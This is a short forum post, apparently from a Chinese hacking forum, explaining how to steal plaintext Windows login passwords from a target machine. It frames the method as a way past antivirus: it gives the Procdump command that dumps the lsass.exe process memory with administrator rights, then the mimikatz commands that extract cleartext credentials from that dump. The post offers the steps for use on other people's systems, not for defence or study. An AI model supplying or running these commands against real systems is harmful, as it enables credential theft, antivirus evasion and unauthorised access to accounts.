搜索
查看: 291|回复: 0

mimikatz如何读取procdump的内容dump文件获得明文密码

[复制链接]

432

主题

573

帖子

2543

积分

核心成员

Rank: 8Rank: 8

积分
2543
发表于 2016-1-13 17:09:18 | 显示全部楼层 |阅读模式
转载备份


众所周知mimikatz可以直接抓到存放在lsass进程中的明文密码,但是很多情况下有杀软这种瘟神挡道,我们必须另想办法。

procdump是微软官方提供的一个小工具,在微软官方有下载

下载地址

将工具拷贝到目标机器上执行如下命令(需要管理员权限)

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

获得一个lsass进程的内存dump文件lsass.dmp,下面我就们就要用mimikatz(注意是alpha版的mimikatz,否则没有这个命令可用)获得dump文件的明文密码了。

但要注意dump文件和mimikatz的版本对应关系,对应关系如图:

将这个内存dump文件拷贝到mimikatz同目录下,双击打开mimikatz执行情况如图:

  1. mimikatz # sekurlsa::minidump lsass.dmp
  2. Switch to MINIDUMP
  3. mimikatz # sekurlsa::logonPasswords full
复制代码



大功告成,菜鸟言论,仅供娱乐。


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
您可以更新记录, 让好友们知道您在做什么...
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表